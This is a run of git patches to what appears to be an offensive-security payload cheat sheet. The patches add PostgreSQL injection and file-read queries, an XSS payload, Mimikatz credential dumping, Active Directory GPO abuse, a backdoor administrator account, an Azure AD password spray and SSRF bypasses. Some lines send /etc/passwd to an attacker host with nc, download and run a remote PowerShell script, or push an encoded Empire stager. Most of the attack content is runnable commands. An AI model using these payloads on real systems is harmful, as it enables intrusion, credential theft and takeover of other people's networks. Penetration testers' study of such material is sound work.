 .../Linux - Privilege Escalation.md               | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index ae1705c..db7a558 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -497,6 +497,21 @@ find / -perm -2 -type f 2>/dev/null
 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
 
+### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
+
+/etc/sysconfig/network-scripts/ifcfg-1337 for example
+
+```powershell
+NAME=Network /bin/id  &lt;= Note the blank space
+ONBOOT=yes
+DEVICE=eth0
+
+EXEC :
+./etc/sysconfig/network-scripts/ifcfg-1337
+```
+src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f]
+(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
+
 ### Writable /etc/passwd
 
 First generate a password with one of the following commands.

From 53db029d4e9a102e7bf7e897a008f81e87978d43 Mon Sep 17 00:00:00 2001
From: DoI <5291556+denandz@users.noreply.github.com>
Date: Tue, 5 May 2020 15:10:44 +1200
Subject: [PATCH 48/85] Added additional info to the Postgres SQLi page

---
 SQL Injection/PostgreSQL Injection.md | 31 ++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index 00bbbf4..e2e4c09 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -14,6 +14,7 @@
 * [PostgreSQL List tables](#postgresql-list-tables)
 * [PostgreSQL List columns](#postgresql-list-columns)
 * [PostgreSQL Error Based](#postgresql-error-based)
+* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
 * [PostgreSQL Blind](#postgresql-blind)
 * [PostgreSQL Time Based](#postgresql-time-based)
 * [PostgreSQL Stacked query](#postgresql-stacked-query)
@@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
 ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
 ```
 
+## PostgreSQL XML helpers
+
+```sql
+select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
+```
+
+The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
+
+```sql
+select database_to_xml(true,true,''); -- dump the current database to XML
+select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
+```
+
+Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
+
 ## PostgreSQL Blind
 
 ```sql
@@ -135,7 +151,7 @@ select pg_ls_dir('./');
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 
-NOTE: ``pg_read_file` doesn't accept the `/` character.
+NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group.
 
 ```sql
 CREATE TABLE temp(t TEXT);
@@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd';
 SELECT * FROM temp limit 1 offset 0;
 ```
 
+```sql
+SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
+SELECT lo_get(16420); -- use the OID returned from the above
+SELECT * from pg_largeobject; -- or just get all the large objects and their data
+```
+
 ## PostgreSQL File Write
 
 ```sql
@@ -152,6 +174,12 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 
+```sql
+SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
+SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
+SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
+```
+
 ## PostgreSQL Command execution
 
 ### CVE-2019–9193
@@ -181,3 +209,4 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
 * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
 * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
 * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
+* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)

From 5aad5795d2131dfa8d773e281fddc6acfef25e47 Mon Sep 17 00:00:00 2001
From: DoI <5291556+denandz@users.noreply.github.com>
Date: Tue, 5 May 2020 15:15:50 +1200
Subject: [PATCH 49/85] minor spelling fix

---
 SQL Injection/PostgreSQL Injection.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index e2e4c09..d21dfca 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -151,7 +151,7 @@ select pg_ls_dir('./');
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 
-NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group.
+NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
 
 ```sql
 CREATE TABLE temp(t TEXT);

From eb28e4c28d0214473665fe16740ba923477b0c4f Mon Sep 17 00:00:00 2001
From: "reza.duty" <reza.duty.persian@gmail.com>
Date: Wed, 6 May 2020 22:57:55 +0430
Subject: [PATCH 50/85] add Self Closing Script

---
 XSS Injection/README.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 8b46e60..15495bd 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Javascript keylogger](#javascript-keylogger)
   - [Other ways](#other-ways)
 - [Identify an XSS endpoint](#identify-an-xss-endpoint)
-- [XSS in HTML/Applications](#xss-in-htmlapplications)
+- [XSS in HTML/Applications](#xss-in-llapplications)
 - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
 - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
 - [XSS in PostMessage](#xss-in-postmessage)
@@ -143,6 +143,7 @@ Svg payload
 <svg id=alert(1) onload=eval(id)>
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
 "><svg/onload=alert(/XSS/)
+<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
 
 Div payload
 <div onpointerover="alert(45)">MOVE HERE</div>
@@ -1128,3 +1129,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
 - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
+- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)

From d0bb0f6f5b73368eec3a63fd1aa2ce9bb9ad2c36 Mon Sep 17 00:00:00 2001
From: Thomas Orlita <github@thomasorlita.cz>
Date: Sun, 10 May 2020 10:32:51 +0200
Subject: [PATCH 51/85] Update CSP Evaluator blog link

---
 XSS Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 15495bd..23db803 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -929,7 +929,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
 
 ## CSP Bypass
 
-Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://appio.dev/vulns/google-csp-evaluator/)
+Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
 
 ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
 

From 7f1c150edd0cec7fec4c2e1388bb7ffe59ce4753 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 10 May 2020 16:17:10 +0200
Subject: [PATCH 52/85] Mimikatz Summary

---
 .../Active Directory Attack.md                |  9 ++++-
 .../Windows - Mimikatz.md                     | 38 ++++++++++++++-----
 SQL Injection/MSSQL Injection.md              |  3 +-
 XSS Injection/README.md                       |  2 +-
 4 files changed, 40 insertions(+), 12 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 489fcd1..b6539e7 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -407,6 +407,11 @@ Get-NetGPOGroup
 ### Exploit Group Policy Objects GPO
 
 ```powershell
+# Build and configure SharpGPOAbuse
+git clone https://github.com/FSecureLABS/SharpGPOAbuse
+Install-Package CommandLineParser -Version 1.9.3.15
+ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll
+
 # Adding User Rights
 SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
 
@@ -1250,7 +1255,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
 [*] Saving ticket in Administrator.ccache
 
 # Exploit with Rubeus
-$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
+$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
+$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt
+$ dir \\dc.domain.com\c$
 ```
 
 
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
index ff34988..46682b9 100644
--- a/Methodology and Resources/Windows - Mimikatz.md	
+++ b/Methodology and Resources/Windows - Mimikatz.md	
@@ -2,15 +2,16 @@
 
 ## Summary
 
-* [Mimikatz - Execute commands](#)
-* [Mimikatz - Extract passwords](#)
-* [Mimikatz - Mini Dump](#)
-* [Mimikatz - Golden ticket](#)
-* [Mimikatz - Skeleton key](#)
-* [Mimikatz - RDP session takeover](#)
-* [Mimikatz - Credential Manager & DPAPI](#)
-* [Mimikatz - Commands list](#)
-* [Mimikatz - Powershell version](#)
+* [Mimikatz - Execute commands](#mimikatz---execute-commands)
+* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
+* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
+* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
+* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
+* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
+* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
+* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
+* [Mimikatz - Commands list](#mimikatz---commands-list)
+* [Mimikatz - Powershell version](#mimikatz---powershell-version)
 * [References](#references)
 
 ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
@@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 
 ## Mimikatz - RDP session takeover
 
+Use `ts::multirdp` to patch the RDP service to allow more than two users.
+
 Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
 
 ```powershell
@@ -125,6 +128,8 @@ net start sesshijack
 ```
 
 
+
+
 ## Mimikatz - Credential Manager & DPAPI
 
 ```powershell
@@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi
 $ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
 ```
 
+Task Scheduled credentials
+
+```powershell
+mimikatz(commandline) # vault::cred /patch
+TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / <NULL>
+UserName   : DOMAIN\user
+Comment    : <NULL>
+Type       : 2 - domain_password
+Persist    : 2 - local_machine
+Flags      : 00004004
+Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+Attributes : 0
+```
+
+
 ## Mimikatz - Commands list
 
 | Command |Definition|
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 2be3918..35836c8 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -239,4 +239,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
 * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
 * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
 * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
-* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
\ No newline at end of file
+* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
+* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
\ No newline at end of file
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 23db803..7b28ee9 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Javascript keylogger](#javascript-keylogger)
   - [Other ways](#other-ways)
 - [Identify an XSS endpoint](#identify-an-xss-endpoint)
-- [XSS in HTML/Applications](#xss-in-llapplications)
+- [XSS in HTML/Applications](#xss-in-htmlapplications)
 - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
 - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
 - [XSS in PostMessage](#xss-in-postmessage)

From 3ed2b28e59899094038d24d0c528bd7eddced3bf Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 10 May 2020 23:16:29 +0200
Subject: [PATCH 53/85] Add user /Y + GPO Powerview

---
 .../Active Directory Attack.md                  | 17 ++++++++++++++++-
 .../Windows - Using credentials.md              |  2 +-
 2 files changed, 17 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index b6539e7..12efdd6 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -406,6 +406,8 @@ Get-NetGPOGroup
 
 ### Exploit Group Policy Objects GPO
 
+> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
+
 ```powershell
 # Build and configure SharpGPOAbuse
 git clone https://github.com/FSecureLABS/SharpGPOAbuse
@@ -425,6 +427,16 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent
 SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
 ```
 
+Abuse GPO with PowerView
+
+```powershell
+# Enumerate GPO
+Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
+
+# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO
+New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force
+```
+
 
 ### Dumping AD Domain Credentials
 
@@ -1629,4 +1641,7 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
 * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
 * [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
-* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
\ No newline at end of file
+* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
+* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
+* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
+* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index b1148a3..eac15a9 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -25,7 +25,7 @@
 ### TIP 1 - Create your credential
 
 ```powershell
-net user hacker hacker1234* /add
+net user hacker Hcker_12345678* /add /Y
 net localgroup administrators hacker /add
 net localgroup "Remote Desktop Users" hacker /add # RDP access
 net localgroup "Backup Operators" hacker /add # Full access to files

From e95a4aeac0cab0c387fe99e1137fa4062fb4c1f7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 11 May 2020 17:08:03 +0200
Subject: [PATCH 54/85] MSOL AD Spray

---
 .../Cloud - Azure Pentest.md                     | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index 7a3c720..ec7384d 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -7,6 +7,7 @@
 * [Azure Storage Account - Access](#azure-storage-account----access)
 * [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
 * [Azure AD - Enumeration](#azure-ad---enumeration)
+* [Azure AD - Password Spray](#azure-ad---password-spray)
 * [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
 * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
 * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
@@ -286,6 +287,21 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
 3. Pick the account from the active sessions
 4. Select Azure Active Directory and enjoy!
 
+## Azure AD - Password Spray
+
+```powershell
+git clone https://github.com/dafthack/MSOLSpray
+Import-Module .\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
+Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
+
+# UserList  - UserList file filled with usernames one-per-line in the format "user@domain.com"
+# Password  - A single password that will be used to perform the password spray.
+# OutFile   - A file to output valid results to.
+# Force     - Forces the spray to continue and not stop when multiple account lockouts are detected.
+# URL       - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
+```
+
 ## Azure AD - Convert GUID to SID
 
 The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.

From a65fdbb568fe861b7e4dd4083cd96391a0d74562 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 12 May 2020 14:27:25 +0200
Subject: [PATCH 55/85] XSW 4 Fix #205

---
 Methodology and Resources/Cloud - Azure Pentest.md | 3 ++-
 SAML Injection/README.md                           | 2 +-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index ec7384d..b84ac81 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -30,8 +30,9 @@
     $ git clone https://github.com/hausec/PowerZure
     $ ipmo .\PowerZure
     $ Set-Subscription -Id [idgoeshere]
+
     # Reader
-    $ Get-Runbook
+    $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
 
     # Contributor
     $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index e244bfd..2ba8dae 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -70,7 +70,7 @@ XML Signature Wrapping (XSW) attack, some implementations check for a valid sign
 - XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature.
 - XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature.
 - XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion.
-- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion.
+- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion.
 - XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message.
 - XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature.
 - XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion.

From a5d220d5993a92fc897839b5ad4d6af466453087 Mon Sep 17 00:00:00 2001
From: John <erik.elbieh@protonmail.com>
Date: Wed, 13 May 2020 12:19:36 -0400
Subject: [PATCH 56/85] Added SSRF bypass details

---
 Server Side Request Forgery/README.md | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 8cc6592..da3fcfa 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -15,6 +15,7 @@
   * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
   * [Bypass using malformed urls](#bypass-using-malformed-urls)
   * [Bypass using rare address](#bypass-using-rare-address)
+  * [Bypass using URL encoding](#bypass-using-url-encoding)
   * [Bypass using bash variables](#bypass-using-bash-variables)
   * [Bypass using tricks combination](#bypass-using-tricks-combination)
   * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
@@ -76,7 +77,7 @@ http://localhost:443
 http://localhost:22
 ```
 
-Advanced exploit using a redirection
+Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
 
 ```powershell
 1. Create a subdomain pointing to 192.168.0.1 with DNS A record  e.g:ssrf.example.com
@@ -177,6 +178,15 @@ http://127.1
 http://127.0.1
 ```
 
+### Bypass using URL encoding
+
+[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
+
+```powershell
+http://127.0.0.1/%61dmin
+http://127.0.0.1/%2561dmin
+```
+
 ### Bypass using bash variables 
 
 (curl only)

From eb074393df4069eaf1d0429274f8510a17673a4b Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 13 May 2020 23:07:39 +0200
Subject: [PATCH 57/85] Windows Persistence - Binary replacing

---
 .../Cloud - Azure Pentest.md                  | 15 ++++++++--
 .../Windows - Persistence.md                  | 29 ++++++++++++++++++-
 2 files changed, 41 insertions(+), 3 deletions(-)

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index b84ac81..f8c1857 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -177,6 +177,8 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest
 
 > By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph.
 
+Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`.
+
 ```powershell
 $ git clone https://github.com/dirkjanm/ROADtools
 $ pip install roadrecon
@@ -290,6 +292,8 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
 
 ## Azure AD - Password Spray
 
+> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds
+
 ```powershell
 git clone https://github.com/dafthack/MSOLSpray
 Import-Module .\MSOLSpray.ps1
@@ -357,7 +361,11 @@ Prerequisite:
   * Compromise a server with Azure AD Connect service
   * Access to ADSyncAdmins or local Administrators groups
 
-Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account
+Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
+* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
+* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
+
+Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
 
 ## Azure AD Connect - Seamless Single Sign On Silver Ticket
 
@@ -455,6 +463,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
     https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
     </AuthURL>
     ```
+* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt`
 * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
 
 
@@ -473,4 +482,6 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
 * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
 * [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
-* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
\ No newline at end of file
+* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
+* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
